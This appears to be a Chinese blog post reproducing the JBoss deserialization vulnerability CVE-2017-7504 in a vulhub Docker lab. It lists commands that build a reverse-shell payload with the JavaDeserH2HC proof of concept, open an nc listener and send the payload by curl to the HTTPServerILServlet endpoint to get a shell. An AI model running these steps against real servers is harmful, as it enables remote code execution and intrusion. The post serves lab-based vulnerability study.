CVE-2017-7504 JBOSS反序列化漏洞復現

冰淇淋乾杯發表於2021-01-04

一、漏洞描述

  JBoss AS 4.x及之前版本中,JbossMQ實現過程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java檔案存在反序列化漏洞,遠端攻擊者可藉助特製的序列化資料利用該漏洞執行任意程式碼。

二、漏洞環境搭建

需要使用的工具如下

1.docker+vulhub漏洞庫
2.漏洞POC:下載連結https://github.com/joaomatosf/JavaDeserH2HC
3.攻擊機kali虛擬機器(版本隨意)
4.靶機Ubuntu18.04虛擬機器(其他也可以)

開啟Ubuntu虛擬機器,有docker環境和vulhub漏洞庫的話就直接進入環境,沒有的話先安裝docker和下載vulhub漏洞庫(網上教程很多,這裡就不多介紹了)

root@admin666-virtual-machine:~/vulhub-master/jboss/CVE-2017-7504# 

執行命令

root@admin666-virtual-machine:~/vulhub-master/jboss/CVE-2017-7504# docker-compose up -d

等到出現以下頁面說明已經搭建完成

可以訪問http://your-ip:8080,出現如下頁面證明環境搭建成功!

三、漏洞利用

進入kali利用漏洞POC進行驗證

1、先把POC克隆到kali中,執行命令

git clone https://github.com/joaomatosf/JavaDeserH2HC

2、進入JavaDeserH2HC目錄,執行

javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java

3、設定接收shell的IP和埠

java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap 攻擊機IP:監聽埠

4、使用nc監聽埠

nc -lvvp 監聽埠

5、用攻擊機傳送payload,在JavaDeserH2HC目錄下執行

curl http://192.168.1.17:8080/jbossmq-httpil/HTTPServerILServlet  --data-binary @ReverseShellCommonsCollectionsHashMap.ser

6、檢視監聽埠返回的shell,可以執行命令,至此漏洞驗證完成


7、關閉docker環境

docker-compose -down

相關文章